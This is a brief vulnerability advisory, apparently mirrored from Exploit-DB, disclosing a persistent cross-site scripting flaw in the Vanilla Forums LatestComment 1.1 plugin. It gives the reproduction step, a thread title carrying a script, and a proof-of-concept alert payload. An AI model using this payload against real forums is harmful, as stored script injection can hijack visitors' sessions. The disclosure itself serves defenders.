Vanilla Forums LatestComment 1.1 Plugin – Persistent Cross-Site Scripting

  • 作者: Henry Hoggard
    日期: 2012-05-18
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/18908/
  • # Title: Vanilla LatestComment 1.1 Plugin Persistant XSS Vulnerability
    # Date: 18/5/12
    # Author: Henry Hoggard
    # Author URL: henryhoggard.co.uk
    # Author Twitter: @henryhoggard
    # Software: Vanilla Version 2.0.18.4 + Latest Comment 1.1
    
    #http://vanillaforums.org/addon/latestcomment-plugin
    
    # http://vanillaforums.org
    #############################################################
    
    Create a new thread with your XSS as the thread title, the XSS will appear on the index page of the forum.
    
    XSS:
    <script>alert('x')</script>
    
    #############################################################
    
    http://henryhoggard.co.uk